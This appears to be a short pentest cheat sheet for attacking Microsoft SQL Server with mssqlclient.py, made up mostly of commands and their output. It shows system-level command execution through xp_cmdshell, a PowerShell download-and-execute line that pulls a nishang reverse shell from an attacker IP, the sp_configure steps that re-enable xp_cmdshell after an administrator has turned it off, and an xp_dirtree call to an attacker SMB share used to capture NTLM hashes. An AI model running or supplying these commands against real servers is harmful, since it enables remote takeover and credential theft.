MSSQL Client

Connect via mssqlclient.py

mssqlclient.py [email protected]

It is possible to obtain RCE via xp_cmdshell

SQL> xp_cmdshell whoami
output                                                                             
nt authority\\system

Get revshell via nishang ps1

EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("<http://192.168.119.122/Utilities/Revshells/shell.ps1>") | powershell -noprofile'

Sometimes xp_cmdshell can be disabled :

[-] ERROR(CHIMERA\\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of 
the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdsh
ell', search for 'xp_cmdshell' in SQL Server Books Online.

It can be enabled by typing the following:

SQL> sp_configure 'show advanced options', '1'
[*] INFO(CHIMERA\\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE
SQL> sp_configure 'xp_cmdshell', '1' 
[*] INFO(CHIMERA\\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE

Obtain ntlm hashes , set up responder and connect to your smb share via xp_dirtree

xp_dirtree '\\\\10.10.14.14\\a';